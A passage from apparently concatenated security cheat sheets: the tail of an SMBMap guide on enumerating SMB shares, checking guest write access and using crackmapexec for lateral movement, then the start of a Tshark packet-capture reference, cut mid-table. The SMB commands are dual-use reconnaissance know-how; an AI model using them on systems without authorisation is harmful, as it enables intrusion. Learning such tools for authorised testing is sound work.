--admin 109 | ``` 110 | 111 | --- 112 | 113 | ## **4. Advanced Techniques** 114 | 115 | ### **Port Redirection** 116 | Target non-standard SMB port (e.g., 8445): 117 | ```bash 118 | smbmap -H 192.168.1.1 -P 8445 119 | ``` 120 | 121 | ### **Read-Only Checks** 122 | Check if shares are writable: 123 | ```bash 124 | smbmap -u guest -p '' -H 192.168.1.1 --no-write-check 125 | ``` 126 | 127 | ### **Brute-Force Share Names** 128 | Combine with `enum4linux` or `nmap` scripts for share discovery. 129 | 130 | --- 131 | 132 | ## **5. Useful Tips** 133 | - Use `-v` for debugging connection issues. 134 | - Combine with `crackmapexec` for lateral movement. 135 | - For interactive sessions, use `smbclient` (e.g., `smbclient //192.168.1.1/C$ -U admin`). 136 | - Always check permissions (`--admin`, `-R`) before attempting writes. 137 | 138 | --- 139 | 140 | ## **6. References** 141 | - [SMBMap GitHub](https://github.com/ShawnDEvans/smbmap) 142 | -------------------------------------------------------------------------------- /Tshark_CheatSheet.md: -------------------------------------------------------------------------------- 1 | # Tshark Cheat Sheet 2 | *Command-Line Network Protocol Analyzer* 3 | 4 | --- 5 | 6 | ## Overview 7 | 8 | - **Tshark**: A tool for capturing and analyzing network traffic via the command line. 9 | - **Capture Filters**: (BPF syntax) Applied during capture to limit the data saved. 10 | - **Display Filters**: (Wireshark filtering language) Applied when reading a capture file. 11 | - **Use Cases**: Live monitoring, offline analysis, protocol troubleshooting, and generating statistics. 12 | 13 | --- 14 | 15 | ## Installation 16 | 17 | ### Ubuntu/Debian 18 | ```bash 19 | sudo apt-get install tshark 20 | ``` 21 | 22 | ### Arch Linux 23 | ```bash 24 | sudo pacman -S tshark 25 | ``` 26 | 27 | --- 28 | 29 | ## Common Flags and Options 30 | 31 | | **Flag** | **Description** | **Example** | 32 | |--------------------------------|------------------------------------------------------------------------------------------------------|-----------------------------------------------| 33 | | `-i ` | Specify the network interface (e.g., `eth0`, `wlan0`) to capture packets from. | `sudo tshark -i eth0` | 34 | | `-w ` | Write captured packets to a file in PCAP format. | `sudo tshark -i eth0 -w capture.pcap` | 35 | | `-r ` | Read packets from a saved capture file. | `tshark -r capture.pcap` | 36 | | `-f ""` | Apply a capture filter (BPF syntax) during capture. | `sudo tshark -i eth0 -f "tcp port 80"` | 37 | | `-Y ""` | Apply a display filter to show specific packets from a capture file. | `tshark -r capture.pcap -Y "http"` | 38 | | `-T ` | Specify output format (e.g., `fields`, `json`, `pdml`, `text`). | `tshark -r capture.pcap -T json` | 39 | | `-e ` | Print a specific field in the output (used with `-T fields`). | `-e http.request.method` | 40 | | `-V` | Enable verbose output for detailed packet information. | `sudo tshark -i eth0 -V` | 41 | | `-c ` | Stop capture after a fixed number of packets. | `sudo tshark -i eth0 -c 100` | 42 | | `-n` | Disable name resolution for faster capture and output (IP addresses remain numeric). | `sudo tshark -i eth0 -n` | 43 | | `-q` | Quiet mode: minimal output, useful when combined with statistics or follow options. | `tshark -r capture.pcap -qz conv,ip` | 44 | | `-b